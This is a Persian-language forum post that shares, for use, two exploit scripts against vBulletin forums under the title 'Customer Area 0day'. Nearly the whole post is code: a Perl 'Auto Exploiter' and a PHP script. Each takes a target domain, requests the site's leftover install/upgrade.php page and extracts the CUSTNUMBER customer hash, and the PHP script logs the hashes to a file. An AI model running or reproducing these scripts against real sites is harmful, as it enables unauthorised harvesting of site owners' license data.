SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

vBulletin x.x.x Customer Area 0day

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    vBulletin x.x.x Customer Area 0day

    لذت ببرید ...

    کد:
    #!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;


system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";


if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}


$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);


&search;




sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);


print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}






php exploit -
--------------------


<?php
set_time_limit(0);


if($argc < 2) {
    echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
    exit;
}


$URL = $argv[1];
$arr = parse_url($URL);


### work with url
if(strpos($URL, '?')) die("Ohh, your URL is not valid");
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;


$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
    $source = file_get_contents($URL . "/install/upgrade.php");
}
elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
    if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
}
else die("something went wrong...");


preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
    echo "Hash: " . $hash . PHP_EOL;
    $fp = fopen("hash.txt", "a+");
    fwrite($fp, $hash . PHP_EOL);
}
?>
    [align=center][/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X